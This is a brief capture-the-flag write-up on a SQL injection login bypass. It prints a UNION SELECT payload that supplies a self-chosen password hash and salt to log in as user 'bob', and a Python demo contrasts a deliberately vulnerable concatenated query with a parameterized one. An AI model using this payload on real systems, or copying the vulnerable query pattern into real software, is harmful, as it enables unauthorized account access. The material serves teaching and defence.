This challenge had a rather interesting SQL Injection vulnerability. My first train of thought brought me to trying to modify a password or insert an extra record, but that was made difficult by the disabling of multiqueries on the server. The solution ended up being a pretty cool UNION query in SQL where you tell the database exactly which strings to select. All you needed to do was hash your own password + salt (mine was "password"+"abcdef"). The solution is shown below.
bob' UNION SELECT ID, '1a7d8a297d27da26806a242253747eb89335a487b017889173cbe73e33ca2ecd', 'abcdef' from users where username='bob' --
-- suntzu_II
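To show why the UNION row is accepted and what stops it, here is an added example (not code from the challenge or from this post) that runs the same login check with string concatenation and with a bound parameter. The table layout, SHA-256 as the hash, the sample user data, and the "accept if any returned row matches" logic are all assumptions.

```python
import hashlib
import hmac
import sqlite3

def hash_pw(password, salt):
    # Assumption: SHA-256 over password + salt; the post does not name the hash.
    return hashlib.sha256((password + salt).encode()).hexdigest()

def make_db():
    # Constructed sample data: one user whose real password the caller lacks.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,"
               " hash TEXT, salt TEXT)")
    db.execute("INSERT INTO users (username, hash, salt) VALUES (?, ?, ?)",
               ("bob", hash_pw("bobs-real-secret", "s4lt99"), "s4lt99"))
    return db

def verify(rows, password):
    # Assumed application logic: accept if any returned (id, hash, salt) row
    # matches the supplied password.
    return any(hmac.compare_digest(hash_pw(password, salt), stored)
               for _id, stored, salt in rows)

def login_vulnerable(db, username, password):
    # Input is spliced into the SQL text, so a quote in it changes the query
    # and a UNION can append a row whose hash and salt the caller chose.
    sql = ("SELECT id, hash, salt FROM users WHERE username = '"
           + username + "'")
    return verify(db.execute(sql).fetchall(), password)

def login_safe(db, username, password):
    # Bound parameter: the whole input is compared as a username value.
    rows = db.execute("SELECT id, hash, salt FROM users WHERE username = ?",
                      (username,)).fetchall()
    return verify(rows, password)

# Same shape as the string in the post, with the hash computed locally.
PAYLOAD = ("bob' UNION SELECT id, '" + hash_pw("password", "abcdef")
           + "', 'abcdef' FROM users WHERE username='bob' --")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "password"))
    print("parameterized:", login_safe(db, PAYLOAD, "password"))
```

With the bound parameter the injected text matches no username, so no row comes back and the hash comparison never sees attacker-chosen values.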